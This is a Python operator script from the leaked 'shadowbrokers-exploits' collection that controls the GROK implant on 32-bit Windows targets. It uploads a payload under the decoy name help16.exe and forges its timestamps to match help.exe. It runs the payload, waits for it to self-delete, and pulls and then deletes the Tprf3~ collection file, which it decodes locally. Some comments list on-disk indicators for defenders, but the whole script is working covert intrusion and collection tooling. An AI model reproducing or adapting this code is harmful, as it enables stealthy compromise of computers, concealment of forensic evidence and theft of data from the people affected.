shadowbrokers-exploits/windows/Resources/GROK/PyScripts/grok_x86.py


import dsz.lp
import dsz.version
import dsz.ui
import dsz.path
import dsz.file
import dsz.control
import dsz.menu
import dsz.env
# Tool identity: used for RecordToolUse logging in main() and to locate
# the resource tree below.  `fileName` is the name the payload is written
# under on the target; changename() can replace it at runtime.
tool = 'Grok'
version = '1.2.0.1'
fileName = 'help16.exe'
# Operator-side directories supplied by the dsz framework.
resDir = dsz.lp.GetResourcesDirectory()
logdir = dsz.lp.GetLogsDirectory()
# <resources>\Grok\1.2.0.1 -- the Uploads\ and Offline\ subtrees referenced
# by putfile()/parsefile() live under this path.
GROK_PATH = ('%s\\%s\\%s' % (resDir, tool, version))
def grokverify(input):
    """Report whether the GROK artifacts are present on the target.

    Checks for the tm154*.da files under <systemPath>\\..\\temp and for the
    msrtdv.sys driver under <systemPath>\\drivers, then classifies the host
    as fully installed, partially installed ("bad state"), or clean.  These
    file names and locations are the on-disk indicators this tool leaves
    behind, so they are also what a defender would hunt for.

    `input` is the argument dsz.menu passes to menu callbacks; it is unused.
    Reads the module global `systemPath`, which main() assigns before the
    menu is shown.  Returns True only when both the driver and the storage
    file exist.
    """
    storageSuccessFlag = True
    driverSuccessFlag = True
    success = True
    # Informational checks: neither affects the return value.
    if dsz.file.Exists('tm154d.da', ('%s\\..\\temp' % systemPath)):
        dsz.ui.Echo('tm154d.da dump file exists ... this should not be here', dsz.ERROR)
    if dsz.file.Exists('tm154p.da', ('%s\\..\\temp' % systemPath)):
        dsz.ui.Echo('tm154p.da overflow file exists ... log may be full', dsz.ERROR)
    if dsz.file.Exists('tm154_.da', ('%s\\..\\temp' % systemPath)):
        dsz.ui.Echo('tm154_.da config file exists ... ', dsz.GOOD)
    # The two checks below decide the outcome.
    if dsz.file.Exists('tm154o.da', ('%s\\..\\temp' % systemPath)):
        dsz.ui.Echo('tm154o.da storage file exists ... SUCCESSFUL', dsz.GOOD)
    else:
        dsz.ui.Echo('tm154o.da storage file missing ... FAILED', dsz.ERROR)
        storageSuccessFlag = False
    if dsz.file.Exists('msrtdv.sys', ('%s\\drivers' % systemPath)):
        dsz.ui.Echo('msrtdv.sys driver exists ... SUCCESSFUL', dsz.GOOD)
    else:
        dsz.ui.Echo('msrtdv.sys driver missing ... FAILED', dsz.ERROR)
        driverSuccessFlag = False
    if ((driverSuccessFlag == True) and (storageSuccessFlag == True)):
        dsz.ui.Echo('GROK properly installed on target', dsz.GOOD)
    # Exactly one of the two components present -> inconsistent install.
    elif (((driverSuccessFlag == False) and (storageSuccessFlag == True)) or ((driverSuccessFlag == True) and (storageSuccessFlag == False))):
        dsz.ui.Echo('GROK is in a bad state', dsz.WARNING)
        success = False
    else:
        dsz.ui.Echo("GROK doesn't exist on target!", dsz.ERROR)
        success = False
    return success
def putfile(localfile, remotefile):
    """Upload `localfile` to the target as `remotefile` and align its timestamps.

    Runs the dsz `put` command, then `matchfiletimes` so the new file takes
    the timestamps of <systemPath>\\help.exe.  For forensic purposes this
    means the dropped file's MAC times will not stand out in a simple
    timeline; analysts should not rely on timestamps alone to date it.

    Side effects: stores the put command's task id in the module global
    `putid`, which main() later uses to issue `stop <putid>`.  Reads the
    module global `systemPath`.  Returns True on success; on failure the
    operator is told the file may need manual removal.
    """
    dsz.ui.Echo(('Putting %s on target as %s' % (localfile, remotefile)))
    cmd = ('put %s -name %s' % (localfile, remotefile))
    dsz.control.echo.Off()
    global putid
    # RunEx returns (success, task id); the id is kept so the put task can
    # be stopped from main() once the menu action completes.
    (runsuccess, putid) = dsz.cmd.RunEx(cmd)
    dsz.control.echo.On()
    if (not runsuccess):
        dsz.ui.Echo(('Could not put %s on target as %s' % (localfile, remotefile)), dsz.ERROR)
        return False
    dsz.ui.Echo(('Successfully put %s on target as %s' % (localfile, remotefile)))
    # Timestamp alignment step; the file is already on disk at this point,
    # hence the "manually delete" warning if it fails.
    cmd = ('matchfiletimes -src %s\\help.exe -dst %s' % (systemPath, remotefile))
    dsz.control.echo.Off()
    runsuccess = dsz.cmd.Run(cmd)
    dsz.control.echo.On()
    if (not runsuccess):
        dsz.ui.Echo(('Could not matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile)), dsz.ERROR)
        dsz.ui.Echo('Make sure to manually delete it!!!', dsz.ERROR)
        return False
    dsz.ui.Echo(('Matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile)))
    return True
def runfile(remotefile):
    """Execute `remotefile` on the target via the dsz `run -command` verb.

    Echo output is suppressed around the command.  Returns True when the
    run command reports success, False otherwise (with a reminder to the
    operator that the uploaded file may remain on disk).
    """
    dsz.ui.Echo(('Running %s' % remotefile))
    cmd = ('run -command "%s"' % remotefile)
    dsz.control.echo.Off()
    runsuccess = dsz.cmd.Run(cmd)
    dsz.control.echo.On()
    if (not runsuccess):
        dsz.ui.Echo(('Running %s failed!!!' % remotefile), dsz.ERROR)
        dsz.ui.Echo('Make sure to manually clean!!!', dsz.ERROR)
        return False
    return True
def collectfiles(temppath):
    """Retrieve and delete the collection file <temppath>\\Tprf3~, then decode it.

    Steps: `get` the file (recording output so the local filename can be
    read back), `delete` it on the target, move the local copy into
    <logdir>\\GetFiles\\NOSEND, and hand it to parsefile().  `Tprf3~` is
    the name the on-target component writes its output under, so it is
    another artifact worth looking for on a suspected host.

    Reads the module global `logdir`.  Returns True only if get, delete
    and parsefile all succeed.
    """
    dsz.ui.Echo(('Getting collection file, %s\\Tprf3~' % temppath))
    cmd = ('get %s\\Tprf3~' % temppath)
    dsz.control.echo.Off()
    # RUN_FLAG_RECORD so the local filename chosen by `get` can be queried.
    runsuccess = dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
    dsz.control.echo.On()
    if (not runsuccess):
        dsz.ui.Echo(('Could not get collection file, %s\\Tprf3~' % temppath), dsz.ERROR)
        return False
    getfilename = dsz.cmd.data.Get('FileLocalName::localname', dsz.TYPE_STRING)[0]
    dsz.ui.Echo(('Deleting collection file, %s\\Tprf3~' % temppath))
    cmd = ('delete %s\\Tprf3~' % temppath)
    dsz.control.echo.Off()
    runsuccess = dsz.cmd.Run(cmd)
    dsz.control.echo.On()
    if (not runsuccess):
        dsz.ui.Echo(('Could not delete collection file, %s\\Tprf3~' % temppath), dsz.ERROR)
        return False
    dsz.ui.Echo('Moving file to NOSEND directory...')
    dsz.control.echo.Off()
    # Both mkdir results are ignored; presumably the directories may
    # already exist.
    dsz.cmd.Run(('local mkdir %s\\GetFiles\\NOSEND' % logdir))
    dsz.cmd.Run(('local mkdir %s\\GetFiles\\Grok_Decrypted' % logdir))
    cmd = ('local move %s\\GetFiles\\%s %s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename, logdir, getfilename))
    # NOTE(review): runsuccess is assigned here but never checked, so a
    # failed move falls through to parsefile() with a path that may not exist.
    runsuccess = dsz.cmd.Run(cmd)
    dsz.control.echo.On()
    success = parsefile(('%s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename)))
    if (not success):
        return False
    return True
def parsefile(file):
    """Decode a collected file locally with GkDecoder.exe into an .xml report.

    Runs <GROK_PATH>\\Offline\\GkDecoder.exe on `file`, writing
    <logdir>\\GetFiles\\Grok_Decrypted\\<basename>.xml.  The operator
    machine is the only thing touched here.

    `file` shadows the builtin of the same name.  The command line is built
    by plain string formatting, so a path containing spaces or quotes
    (e.g. one typed into grokparse()) would be split or mis-quoted.
    Returns True if the decoder command reports success.
    """
    (path, filename) = dsz.path.Split(file)
    cmd = ('local run -command "%s\\Offline\\GkDecoder.exe %s %s\\GetFiles\\Grok_Decrypted\\%s.xml"' % (GROK_PATH, file, logdir, filename))
    dsz.control.echo.Off()
    runsuccess = dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
    dsz.control.echo.On()
    if (not runsuccess):
        dsz.ui.Echo('There was an error parsing the collection', dsz.ERROR)
        return False
    return True
def grokparse(input):
    """Menu action: prompt for a local file path and decode it with parsefile().

    `input` is the argument dsz.menu passes to callbacks; it is unused.
    An empty answer to the prompt is reported as an error and returns False.
    Otherwise returns the result of parsefile().
    """
    fullpath = dsz.ui.GetString('Please enter the full path to the file you want parse: ', '')
    if (fullpath == ''):
        dsz.ui.Echo('No string entered', dsz.ERROR)
        return False
    success = parsefile(fullpath)
    if (not success):
        return False
    return True
def sleepwait():
    """Poll every 5 s until <systemPath>\\<fileName> disappears from the target.

    The uploaded executable is expected to remove itself after running;
    this loop returns True once dsz.file.Exists() no longer finds it.
    Reads the module globals `fileName` and `systemPath`.

    NOTE(review): there is no iteration limit or timeout -- if the file is
    never deleted the operator has to interrupt the script manually.
    """
    while True:
        dsz.ui.Echo('Sleeping 5s to see if exe self deletes')
        dsz.Sleep(5000)
        if (not dsz.file.Exists(fileName, systemPath)):
            dsz.ui.Echo('Executeable self deleted, good to go')
            return True
        else:
            dsz.ui.Echo('Executeable did not self delete', dsz.ERROR)
def cdtotemp():
    """Save the current remote directory and change into <systemPath>\\..\\temp.

    Uses `pwd` with RUN_FLAG_RECORD to capture the current path so that
    cdreturn() can restore it later.  Reads the module global `systemPath`.
    Returns a (temppath, curpath) tuple; the `cd` result itself is not checked.
    """
    dsz.control.echo.Off()
    cmd = 'pwd'
    dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
    curpath = dsz.cmd.data.Get('CurrentDirectory::path', dsz.TYPE_STRING)[0]
    temppath = ('%s\\..\\temp' % systemPath)
    cmd = ('cd %s' % temppath)
    dsz.cmd.Run(cmd)
    dsz.control.echo.On()
    return (temppath, curpath)
def cdreturn(curpath):
    """Change the remote working directory back to `curpath` (saved by cdtotemp()).

    Always returns True; the result of the `cd` command is not inspected.
    """
    dsz.control.echo.Off()
    cmd = ('cd %s' % curpath)
    dsz.cmd.Run(cmd)
    dsz.control.echo.On()
    return True
def grokinstall(input):
    """Menu action: upload and run the installer component msgki.ex_.

    Writes <GROK_PATH>\\Uploads\\msgki.ex_ to <systemPath>\\<fileName>,
    executes it, then waits for it to self-delete.  `input` is the dsz.menu
    callback argument and is unused.  Returns False if the upload or the
    run fails; the return value of sleepwait() is ignored.
    """
    success = putfile(('%s\\Uploads\\msgki.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
    if (not success):
        return False
    success = runfile(('%s\\%s' % (systemPath, fileName)))
    if (not success):
        return False
    sleepwait()
    return True
def grokcollect(input):
    """Menu action: upload and run the collector msgkd.ex_, then fetch its output.

    Sequence: putfile() the collector to <systemPath>\\<fileName>, change
    into the temp directory, runfile() it, wait for self-delete, restore
    the working directory, then collectfiles() the resulting Tprf3~ file.
    `input` is the dsz.menu callback argument and is unused.

    NOTE(review): the early returns after cdtotemp() leave the remote
    working directory changed, since cdreturn() is only reached on the
    success path.
    """
    success = putfile(('%s\\Uploads\\msgkd.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
    if (not success):
        return False
    (temppath, curpath) = cdtotemp()
    success = runfile(('%s\\%s' % (systemPath, fileName)))
    if (not success):
        return False
    sleepwait()
    cdreturn(curpath)
    success = collectfiles(temppath)
    if (not success):
        return False
    return True
def grokuninstall(input):
    """Menu action: upload and run the uninstaller msgku.ex_, then clean up.

    Same shape as grokcollect() -- the uninstaller also produces a Tprf3~
    collection file, which is retrieved and decoded -- followed by a
    best-effort deletion of any remaining tm154*.da files under
    <systemPath>\\..\\temp.  `input` is the dsz.menu callback argument and
    is unused.  Returns True once the collection step succeeds, even if the
    final mask delete fails (that failure is only echoed).
    """
    success = putfile(('%s\\Uploads\\msgku.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
    if (not success):
        return False
    (temppath, curpath) = cdtotemp()
    success = runfile(('%s\\%s' % (systemPath, fileName)))
    if (not success):
        return False
    sleepwait()
    cdreturn(curpath)
    success = collectfiles(temppath)
    if (not success):
        return False
    # Assumes dsz.file.Exists() accepts a wildcard mask -- TODO confirm;
    # the other callers in this file pass literal names.
    if dsz.file.Exists('tm154*.da', ('%s\\..\\temp' % systemPath)):
        dsz.ui.Echo('tm154*.da files exist, deleting')
        cmd = ('delete -mask tm154*.da -path %s\\..\\temp' % systemPath)
        dsz.control.echo.Off()
        runsuccess = dsz.cmd.Run(cmd)
        dsz.control.echo.On()
        if (not runsuccess):
            dsz.ui.Echo('Failed to delete tm154*.da', dsz.ERROR)
    return True
def changename(input):
    """Menu action: prompt for a new on-target file name and store it in `fileName`.

    Rebinds the module global `fileName`, which grokinstall(), grokcollect(),
    grokuninstall() and sleepwait() all read.  `input` is the dsz.menu
    callback argument and is unused.  Returns None.
    """
    global fileName
    fileName = dsz.ui.GetString('New upload name for GROK:', 'help16.exe')
    dsz.ui.Echo(('*** Upload name now set to %s ***' % fileName), dsz.WARNING)
def main():
    """Entry point: validate the target, set `systemPath`, and run the menu loop.

    Refuses to run on non-Windows or 64-bit targets, resolves the Windows
    system path into the module global `systemPath` (every other function
    depends on it), then loops on dsz.menu.ExecuteSimpleMenu until the
    operator chooses to exit (menuOption == -1).  After each action the
    outcome is logged with RecordToolUse and, for the actions that uploaded
    a file, the put task is stopped via `stop <putid>`.  Returns 0 in every
    case.
    """
    menuOption = 0
    if (not dsz.version.checks.IsWindows()):
        dsz.ui.Echo('GROK requires a Windows OS', dsz.ERROR)
        return 0
    if dsz.version.checks.IsOs64Bit():
        dsz.ui.Echo(('GROK %s requires x86' % version), dsz.ERROR)
        return 0
    if dsz.path.windows.GetSystemPath():
        # Declared global inside the branch; the assignment below is what
        # the rest of the module reads as `systemPath`.
        global systemPath
        systemPath = dsz.path.windows.GetSystemPath()
    else:
        dsz.ui.Echo('Could not find system path', dsz.ERROR)
        return 0
    # Menu indices (0..5) are what the option checks below compare against.
    menu_list = list()
    menu_list.append({dsz.menu.Name: 'Install', dsz.menu.Function: grokinstall})
    menu_list.append({dsz.menu.Name: 'Uninstall', dsz.menu.Function: grokuninstall})
    menu_list.append({dsz.menu.Name: 'Verify Install', dsz.menu.Function: grokverify})
    menu_list.append({dsz.menu.Name: 'Collect and Parse', dsz.menu.Function: grokcollect})
    menu_list.append({dsz.menu.Name: 'Parse Local', dsz.menu.Function: grokparse})
    menu_list.append({dsz.menu.Name: 'Change Upload Name', dsz.menu.Function: changename})
    while (menuOption != (-1)):
        (retvalue, menuOption) = dsz.menu.ExecuteSimpleMenu(('\n\n========================\nGrok %s Menu\n========================\nUpload Name: %s\n' % (version, fileName)), menu_list)
        # Options 0, 1 and 3 each call putfile() first, which is what
        # assigns the global `putid` used by the `stop` command below.
        if (menuOption == 0):
            if (retvalue == True):
                dsz.lp.RecordToolUse(tool, version, 'DEPLOYED', 'Successful')
            if (retvalue == False):
                dsz.lp.RecordToolUse(tool, version, 'DEPLOYED', 'Unsuccessful')
            dsz.control.echo.Off()
            cmd = ('stop %s' % putid)
            dsz.cmd.Run(cmd)
            dsz.control.echo.On()
        elif (menuOption == 1):
            if (retvalue == True):
                dsz.lp.RecordToolUse(tool, version, 'DELETED', 'Successful')
            if (retvalue == False):
                dsz.lp.RecordToolUse(tool, version, 'DELETED', 'Unsuccessful')
            dsz.control.echo.Off()
            cmd = ('stop %s' % putid)
            dsz.cmd.Run(cmd)
            dsz.control.echo.On()
        elif (menuOption == 2):
            if (retvalue == True):
                dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Successful')
            if (retvalue == False):
                dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Unsuccessful')
        elif (menuOption == 3):
            if (retvalue == True):
                dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Successful')
            if (retvalue == False):
                dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Unsuccessful')
            dsz.control.echo.Off()
            cmd = ('stop %s' % putid)
            dsz.cmd.Run(cmd)
            dsz.control.echo.On()
        elif (menuOption == 4):
            # Parse Local touches only the operator machine; nothing to record.
            pass
        # Option 5 (Change Upload Name) and -1 (exit) fall through silently.
    dsz.ui.Echo('***************************')
    dsz.ui.Echo('* GROK script completed. *')
    dsz.ui.Echo('***************************')
    return 0
# Script entry guard; main()'s integer result is discarded.
if (__name__ == '__main__'):
    main()